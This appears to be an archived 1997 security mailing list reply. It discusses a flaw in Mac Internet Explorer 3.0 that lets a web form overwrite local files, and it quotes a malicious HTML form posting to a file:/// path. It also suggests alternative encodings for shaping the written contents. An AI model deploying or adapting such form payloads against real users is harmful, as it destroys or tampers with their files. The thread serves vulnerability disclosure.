Re: Mac MSIE 3.0 file overwrite.

hurtta+zz@ozone.FMI.FI
Tue, 02 Sep 1997 20:47:12 +0300

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: bukys@CS.ROCHESTER.EDU: "SNI-18 pre-discovered in June 1994"
Previous message: Secure Networks Inc.: "SNI-18: Vacation Vulnerability"
Maybe in reply to: Andrew McNaughton: "Mac MSIE 3.0 file overwrite."

Andrew McNaughton:
> A Maliciously written Form might include the following:
>
> <FORM ACTION="file:///Hard_Disk/Desktop%20Folder/Untitled.html" METHOD="POST">
> <INPUT NAME="This could have overwritten anything!" TYPE=Hidden>
> <Input Type=Submit>
> </FORM>
>
> The file Hard_Disk:Desktop Folder:Untitled.html gets written or
> overwritten, and recieves the following contents:
>
> This+could+have+overwritten+anything%21=

If it supports ENCTYPE on FORM then perhaps also other encodings
may be used. ENCTYPE="multipart/form-data" and ENCTYPE="text/plain"
are good candinates.

/ Kari Hurtta

Next message: bukys@CS.ROCHESTER.EDU: "SNI-18 pre-discovered in June 1994"
Previous message: Secure Networks Inc.: "SNI-18: Vacation Vulnerability"
Maybe in reply to: Andrew McNaughton: "Mac MSIE 3.0 file overwrite."